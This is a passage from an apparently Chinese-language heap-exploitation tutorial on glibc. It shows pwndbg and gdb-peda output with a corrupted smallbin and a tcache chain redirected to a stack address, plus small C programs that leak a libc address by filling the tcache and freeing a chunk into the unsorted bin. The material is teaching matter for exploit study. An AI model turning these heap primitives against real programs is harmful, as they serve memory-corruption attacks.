其 fd 指向下一个空闲块,在 unlink 过程中 bck->fd=bin 的赋值操作使得 0x00007fffffffdbd0+0x10 处写入了一个 libc 地址。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
pwndbg> heapinfo
(0x20) fastbin[0]: 0x0
(0x30) fastbin[1]: 0x0
(0x40) fastbin[2]: 0x0
(0x50) fastbin[3]: 0x0
(0x60) fastbin[4]: 0x0
(0x70) fastbin[5]: 0x0
(0x80) fastbin[6]: 0x0
(0x90) fastbin[7]: 0x0
(0xa0) fastbin[8]: 0x0
(0xb0) fastbin[9]: 0x0
top: 0x5555555598e0 (size : 0x20720)
last_remainder: 0x0 (size : 0x0)
unsortbin: 0x0
(0x0a0) smallbin[ 8]: 0x5555555593d0 (doubly linked list corruption 0x5555555593d0 != 0x7 and 0x5555555593d0 is broken)
(0xa0) tcache_entry[8](7): 0x7fffffffe410 --> 0x5555555593e0 --> 0x555555559700 --> 0x555555559660 --> 0x5555555595c0 --> 0x555555559520 --> 0x555555559480

pwndbg> bins
tcachebins
0xa0 [ 7]: 0x7fffffffe410 —▸ 0x5555555593e0 —▸ 0x555555559700 —▸ 0x555555559660 —▸ 0x5555555595c0 —▸ 0x555555559520 —▸ 0x555555559480 ◂— 0x0
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
smallbins
0xa0 [corrupted]
FD: 0x5555555593d0 —▸ 0x555555559700 ◂— 0x0
BK: 0x7fffffffe410 ◂— 0x0
largebins
empty

libc leak

在以前的 libc 版本中,我们只需这样:

1
2
3
4
5
6
7
8
9
10
#include <stdlib.h>
#include <stdio.h>

int main()
{
long *a = malloc(0x1000);
malloc(0x10);
free(a);
printf("%p\n",a[0]);
}

但是在 2.26 之后的 libc 版本后,我们首先得先把 tcache 填满:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#include <stdlib.h>
#include <stdio.h>

int main(int argc , char* argv[])
{
long* t[7];
long *a=malloc(0x100);
long *b=malloc(0x10);

// make tcache bin full
for(int i=0;i<7;i++)
t[i]=malloc(0x100);
for(int i=0;i<7;i++)
free(t[i]);

free(a);
// a is put in an unsorted bin because the tcache bin of this size is full
printf("%p\n",a[0]);
}

之后,我们就可以 leak libc 了。因为tcache的最大大小为7,超过7个chunk,就会被放到unsorted bin中去。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
gdb-peda$ heapinfo
(0x20) fastbin[0]: 0x0
(0x30) fastbin[1]: 0x0
(0x40) fastbin[2]: 0x0
(0x50) fastbin[3]: 0x0
(0x60) fastbin[4]: 0x0
(0x70) fastbin[5]: 0x0
(0x80) fastbin[6]: 0x0
(0x90) fastbin[7]: 0x0
(0xa0) fastbin[8]: 0x0
(0xb0) fastbin[9]: 0x0
top: 0x555555559af0 (size : 0x20510)
last_remainder: 0x0 (size : 0x0)
unsortbin: 0x555555559250 (size : 0x110)
(0x110) tcache_entry[15]: 0x5555555599f0 --> 0x5555555598e0 --> 0x5555555597d0 --> 0x5555555596c0 --> 0x5555555595b0 --> 0x5555555594a0 --> 0x555555559390
gdb-peda$ parseheap
addr prev size status fd bk
0x555555559000 0x0 0x250 Used None None
0x555555559250 0x0 0x110 Freed 0x7ffff7fc0ca0 0x7ffff7fc0ca0
0x555555559360 0x110 0x20 Used None None
0x555555559380 0x0 0x110 Used None None
0x555555559490 0x0 0x110 Used None None
0x5555555595a0 0x0 0x110 Used None None
0x5555555596b0 0x0 0x110 Used None None